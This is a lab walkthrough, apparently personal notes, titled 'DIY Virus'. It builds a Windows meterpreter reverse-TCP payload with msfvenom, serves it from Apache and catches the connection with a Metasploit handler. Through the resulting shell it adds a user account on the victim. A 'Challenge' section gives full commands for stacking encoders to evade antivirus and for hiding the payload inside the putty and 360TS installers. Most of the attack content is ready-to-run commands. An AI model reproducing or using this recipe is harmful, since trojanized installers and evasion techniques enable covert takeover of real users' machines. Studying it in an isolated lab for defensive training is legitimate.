DIY Virus

Envirnement:

• be Attacked server:
  • os: windows XP
  • ip : 192.168.43.130
• Attack server: kali 5.15.0
  • os: kali linux 5.15.0
  • ip : 192.168.43.132
• Tools: Metasploit
• Test virus web: https://www.virustotal.com/gui/home/upload

Solution

• Using Msfvenom to build a payloads various.
• Deploy payloads various to Web.

Ckeck internet

• check these servers are connect in same LAN
  • using commandping to check
  • Image Not Showing Possible Reasons

    • The image file may be corrupted
    • The server hosting the image is unavailable
    • The image path is incorrect
    • The image format is not supported

    Learn More →
  • make sure your attack server cannect with internet, when we finish to build virus
    
    Image Not Showing Possible Reasons

    • The image file may be corrupted
    • The server hosting the image is unavailable
    • The image path is incorrect
    • The image format is not supported

    Learn More →

Using Msfvenom

• Before using this tools, we must to have these imformation

  • What kind os is we are attack. (linux, mac, linux, etc.)
  • We are attack in which way. In this case, are using web site to attack.
  • Be attacked ip.
  • Where to deploy the virus.

• Using web to attack, so we decide build viruse in web service apache2.

• Using command to build virus

  ​​​​msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.132 LPORT=7749 -f exe > /var/www/html/cmds.exe
  

  • Method:
    ​​​​​​​​-p payload
    ​​​​​​​​-f firewall
    ​​​​​​​​    use firewall setting policy
    ​​​​​​​​reverse_tcp: 
    ​​​​​​​​    not need to know ip
    ​​​​​​​​    not any rule to extra connect
    ​​​​​​​​window
    ​​​​​​​​    can change other platform, Android, unix, Linux,etc.
    ​​​​​​​​LHOST
    ​​​​​​​​    Local host
    ​​​​​​​​Rhost/ Rport
    ​​​​​​​​    Be attacked port
    ​​​​​​​​
    

• Success message

  ​​​​[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
  ​​​​[-] No arch selected, selecting arch: x86 from the payload
  ​​​​No encoder specified, outputting raw payload
  ​​​​Payload size: 354 bytes
  ​​​​Final size of exe file: 73802 bytes
  

• Check the virus file

  ​​​​ls /var/www/html/
  

  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →

Deploy

We deploy the virus on apache2 service, so the apache2 service must be restart, then check the url to download.

• Restart apache2 service
  ​​​​service apache2 restart
  

• Check the service is working
  ​​​​service apache2 status
  

  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →

Msfconsole

Metasploit is Project build by Rapid7 to Penetration test. Msfconsole is Metasploits' command line interface. Armitage is GUI interface of Metasploit buildding by java. In this case, we're using msfconsole to build a handler to connect the server being attack.

• open Metasploits' Msfconsole

  ​​​​msfconsole
  

  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →

• create a handler

  ​​​​use exploit/multi/handler
  

• setting playload

  ​​​​set payload windows/meterpreter/reverse_tcp
  

• setting lhost

  ​​​​set lhost 192.168.43.132
  

• setting lport

  ​​​​set lport 7749
  

• start handler

  ​​​​run
  

• setting success
  

  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →

Download virus on Windows and test Virus

• Open blowser on windows.
• Open the Attack server web by Attack server ip.
  
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
• Add the file name cmds.exe in the end of url to download the virus.
  
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
• Back to kali linux, check msconsole status
  when virus work success, msconsole will change to meterpreter to control the server be attacked.
  
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →

Control and Attack server

This is a simple to controls server is attacked to add a user.

• Check the all the user before attack.
  There is no user call jack, so I'll add a user call jack.
  

  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →

• Open opwershell first

  ​​​​shell
  

  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →

• Using command to add jack account, and set password for 123456
  

  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
  ​​​​net user /add jack 123456
  

• Back to be attacked server, there is a new jack account.
  

  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →

Challenge: using Virsototal get point

• Using Virstotal, to get your virs point, about cmds.exe.
  

  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →

• Try to use other encoder.

  ​​​​msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.132 LPORT=12345 -e x86/shikata_ga_nai -i 9 -f raw -b "\x00" > eoncodex.exe 
  

  

• Try to use other exe file to build, this case is use 360TS.

  ​​​​msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=192.168.43.132 LPORT=7749 -f raw | msfvenom -a x86 --platform windows -e ruby/base64  -i 10 -f raw | msfvenom -a x86 --platform windows -e cmd/echo -i 10 -x 360TS_Setup_Mini.exe -f exe > 360Installer.exe
  

  

• Try to use other exe file to build, this case is use putty.

  ​​​​msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.132 LPORT=7749 -f raw -e x86/shikata_ga_nai -i 9 | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 11 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 6 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 7 -x putty.exe -o putty2.exe
  

  

Reference

• https://github.com/TideSec/BypassAntiVirus
• https://thedarksource.com/msfvenom-cheat-sheet-create-metasploit-payloads/
• https://github.com/cyberteach360/msfvenom
• https://www.golinuxcloud.com/inject-encoded-payload-shellter/
• https://www.iswatlab.eu/wp-content/uploads/2017/01/Technical_Report_Evasion.pdf